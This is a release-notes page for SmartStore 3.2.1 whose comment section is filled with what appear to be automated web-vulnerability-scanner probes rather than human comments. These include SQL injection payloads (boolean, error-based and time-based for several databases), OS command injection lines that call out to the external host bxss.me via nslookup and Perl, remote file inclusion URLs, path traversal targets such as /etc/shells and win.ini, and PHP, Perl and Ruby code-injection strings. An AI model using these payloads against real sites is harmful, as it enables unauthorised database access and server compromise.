Monday, May 27, 2019
SmartStore version 3.2.1
Improvements
- Implemented file range support for CachedFileResult
- Sitemap should only include products visible for current customer, which is the search engine system customer
- Made the spelling of the query string parameter "returnUrl" uniform
- Fixed search engine issue (itemtype, "offers" required) on product detail page
- Summernote: solved html formatting issues thanks to "Beautifier" library
- Media middleware: simplified ETag generation & handling
Bugfixes
- Mega Menu: Product rotator wasn't working
- Tiny Image: Fixed periodic IOException
- URL Rewriter: performance optimization
- Fixed more menu for main catalog navigation
- Fixed DateTime not expressed as UTC in AzureFile & LocalFile
- Content Slider: Fixed slide display bug on Surface and other touch devices
- Content Slider: Randomize slides > The value was stored in the database, but the toggle button always showed "off"
- Page Builder: Fixed slider bug for list blocks (brand, category, products) in Firefox
- Page Builder: Fixed blurry background images on iOS
- Output Cache: action widgets didn't render when they were part of a widgetzone within a donut child action
- Multishop resolution failed under certain circumstances
- Fixed menu issue "collection was modified, enumeration operation may not execute"
- Fixed "The parameters dictionary contains a null entry for parameter 'catId' of non-nullable type 'System.Int32'"
- Fixed discount coupon sometimes not being applied
- Fixed "Value cannot be null. Parameter name: key" in order list
- Fixed topic link resolving by system name in multistore environment
- Async event consumers were not guaranteed to be awaited
Comments (146)
3
3
3
3
3
hTTp://r87.com/n
3
http://r87.com/n? .php
3
http://r87.com/n?.php
3
ns:netsparker056650=vuln
3
php://filter//resource=http://r87.com/n? .php
3
r87.com/n
3
http://example.com/?
ns: netsparker056650=vuln
3
ns:netsparker056650=vuln
3
ns:netsparker056650=vuln
3
1 OR 1=1
3
1 OR 1=1
3
'
3
NS
NO
3
AND 'NS='ss
3
' OR 1=1 OR 'ns'='ns
3
1 OR 17-7=10
3
OR X='ss
3
' OR 1=1 OR '1'='1
3
' OR 1=1 OR '1'='1
3
1 OR 1=1
3
1 OR 1=1
3
'
3
NS
NO
3
%27
3
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
3
AND 'NS='ss
3
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
3
' OR 1=1 OR 'ns'='ns
3
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
3
1 OR 17-7=10
3
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
3
OR X='ss
3
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
' OR 1=1 OR '1'='1
3
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
3
' OR 1=1 OR '1'='1
3
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
3
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
3
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
3
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
3
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
3
NSFTW
3
'+NSFTW+'
3
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
3
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
3
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
3
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
3
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
3
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
3
' WAITFOR DELAY '0:0:25'--
3
1 WAITFOR DELAY '0:0:25'--
3
WAITFOR DELAY '0:0:25'--
3
1) WAITFOR DELAY '0:0:25'--
3
') WAITFOR DELAY '0:0:25'--
3
')) WAITFOR DELAY '0:0:25'--
3
1)) WAITFOR DELAY '0:0:25'--
3
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
+ ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/
3
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
3
((select sleep(25)))a-- 1
3
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
3
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
3
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
3
';SELECT pg_sleep(25)--
3
;SELECT pg_sleep(25)--
3
SELECT pg_sleep(25)--
3
);SELECT pg_sleep(25)--
3
');SELECT pg_sleep(25)--
3
'));SELECT pg_sleep(25)--
3
));SELECT pg_sleep(25)--
3
((SELECT 1 FROM (SELECT SLEEP(25))A))
3
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
3
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
3
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
3
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
3
3
3
3
4
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
3
Mr.
response.write(9512332*9319861)
Mr.
'+response.write(9512332*9319861)+'
Mr.
"+response.write(9512332*9319861)+"
Mr.
echo zgbukp$()\ uzyfey\nz^xyu||a #' &echo zgbukp$()\ uzyfey\nz^xyu||a #|" &echo zgbukp$()\ uzyfey\nz^xyu||a #
Mr.
&echo svyijh$()\ kxluuc\nz^xyu||a #' &echo svyijh$()\ kxluuc\nz^xyu||a #|" &echo svyijh$()\ kxluuc\nz^xyu||a #
Mr.
|echo wadann$()\ jpmbqi\nz^xyu||a #' |echo wadann$()\ jpmbqi\nz^xyu||a #|" |echo wadann$()\ jpmbqi\nz^xyu||a #
Mr.
(nslookup hitjpidrtnuvaf2b3a.bxss.me||perl -e "gethostbyname('hitjpidrtnuvaf2b3a.bxss.me')")
Mr.
$(nslookup hitsjxmxenpgxdb8c2.bxss.me||perl -e "gethostbyname('hitsjxmxenpgxdb8c2.bxss.me')")
Mr.
&(nslookup hitdxjdkjsehx94484.bxss.me||perl -e "gethostbyname('hitdxjdkjsehx94484.bxss.me')")&'\"`0&(nslookup hitdxjdkjsehx94484.bxss.me||perl -e "gethostbyname('hitdxjdkjsehx94484.bxss.me')")&`'
Mr.
|(nslookup hitcptezddxfsbf2f4.bxss.me||perl -e "gethostbyname('hitcptezddxfsbf2f4.bxss.me')")
Mr.
`(nslookup hitxguljrzrsud95ad.bxss.me||perl -e "gethostbyname('hitxguljrzrsud95ad.bxss.me')")`
Mr.
;(nslookup hitoxauedewly56bc0.bxss.me||perl -e "gethostbyname('hitoxauedewly56bc0.bxss.me')")|(nslookup hitoxauedewly56bc0.bxss.me||perl -e "gethostbyname('hitoxauedewly56bc0.bxss.me')")&(nslookup hitoxauedewly56bc0.bxss.me||perl -e "gethostbyname('hitoxauedewly56bc0.bxss.me')")
Mr.
-1 OR 2+659-659-1=0+0+0+1 --
Mr.
-1 OR 3+659-659-1=0+0+0+1 --
Mr.
-1 OR 2+204-204-1=0+0+0+1
Mr.
-1 OR 3+204-204-1=0+0+0+1
Mr.
-1' OR 2+925-925-1=0+0+0+1 --
Mr.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Mr.
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
Mr.
-1' OR 3+925-925-1=0+0+0+1 --
Mr.
Http://bxss.me/t/fit.txt
Mr.
-1' OR 2+571-571-1=0+0+0+1 or 'odx7QpyU'='
Mr.
http://bxss.me/t/fit.txt?.jpg
Mr.
/etc/shells
Mr.
c:/windows/win.ini
Mr.
-1' OR 3+571-571-1=0+0+0+1 or 'odx7QpyU'='
Mr.
-1" OR 2+792-792-1=0+0+0+1 --
Mr.
-1" OR 3+792-792-1=0+0+0+1 --
Mr.
bxss.me
Mr.
'.gethostbyname(lc('hitmm'.'wdgwzzut653f8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(81).chr(118).chr(77).'
Mr.
".gethostbyname(lc("hitxl"."spwzkwhj575ae.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(69).chr(101).chr(65)."
Mr.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Mr.
"+"A".concat(70-3).concat(22*4).concat(122).concat(65).concat(120).concat(81)+(require"socket"
Socket.gethostbyname("hitkv"+"uhtlfonia78da.bxss.me.")[3].to_s)+"
Mr.
';print(md5(31337));$a='
Mr.
'+'A'.concat(70-3).concat(22*4).concat(102).concat(87).concat(108).concat(83)+(require'socket'
Socket.gethostbyname('hityf'+'rpwdqbrz9118a.bxss.me.')[3].to_s)+'
Mr.
";print(md5(31337));$a="
Mr.
${@print(md5(31337))}
Mr.
${@print(md5(31337))}\
Mr.
'.print(md5(31337)).'
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
LeAcPUkI'; waitfor delay '0:0:15' --
Mr.
cIJaLyS0'); waitfor delay '0:0:15' --
Mr.
mPaDYz0K')); waitfor delay '0:0:15' --
Mr.
-5 OR 428=(SELECT 428 FROM PG_SLEEP(15))--
Mr.
-5) OR 560=(SELECT 560 FROM PG_SLEEP(15))--
Mr.
-1)) OR 314=(SELECT 314 FROM PG_SLEEP(15))--
Mr.
W4bSTjsX' OR 217=(SELECT 217 FROM PG_SLEEP(15))--
Mr.
EfqIUaQC') OR 137=(SELECT 137 FROM PG_SLEEP(15))--
Mr.
9KTKZyV6')) OR 433=(SELECT 433 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@3n4Pp